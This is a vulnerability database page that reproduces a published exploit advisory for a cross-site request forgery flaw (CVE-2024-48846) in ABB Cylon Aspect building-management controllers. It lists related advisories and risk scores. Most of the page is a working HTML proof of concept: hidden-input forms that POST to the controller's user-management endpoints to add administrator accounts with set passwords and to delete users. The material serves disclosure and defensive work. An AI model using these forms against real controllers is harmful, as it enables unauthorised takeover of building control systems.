Vulners
Lucene search
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | The vulnerability of microprogramming software in embedded network control controllers of ASPECT Enterprise, NEXUS Series, and MATRIX Series systems relates to the possibility of manipulating cross-site requests. This allows attackers to carry out CSRF attacks. | 9 Dec 202400:00 | – | bdu_fstec |
 | CVE-2024-48846 | 5 Dec 202413:07 | – | circl |
 | ABB ASPECT 安全漏洞 | 5 Dec 202400:00 | – | cnnvd |
 | CVE-2024-48846 | 5 Dec 202412:43 | – | cve |
 | CVE-2024-48846 Cross Side Request Forgery, CSRF | 5 Dec 202412:43 | – | cvelist |
 | ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF) | 16 Apr 202500:00 | – | exploitdb |
 | EUVD-2024-43165 | 3 Oct 202520:07 | – | euvd |
 | Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series | 6 Dec 202411:49 | – | ncsc |
 | CVE-2024-48846 | 5 Dec 202413:15 | – | nvd |
 | CVE-2024-48846 | 5 Dec 202413:15 | – | osv |
10
<html>
<!--
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
21.04.2024
--><body><p>
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
// Add User/Admin
</p>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input name="USER" type="hidden" value="zeroscience"/>
<input name="PASSWORD" type="hidden" value="ZSL251"/>
<input name="ACTION" type="hidden" value="Add"/>
<input type="submit" value="Make me a prince! (php)"/>
</form>
// Add User/Admin
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input name="newuser" type="hidden" value="test"/>
<input name="password" type="hidden" value="test123"/>
<input name="passwordConfirm" type="hidden" value="test123"/>
<input name="Insert" type="hidden" value="Add"/>
<input type="submit" value="Make me a prince! (java)"/>
</form>
// Delete User/Admin
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input name="user9" type="hidden" value="test"/>
<input name="remove9" type="hidden" value="1"/>
<input name="totalRows" type="hidden" value="9"/>
<input name="Delete" type="hidden" value="Delete"/>
<input type="submit" value="Destr0y"/>
</form>
</body></html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2024 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.1 - 7.3
CVSS 47.1
EPSS0.00643
SSVC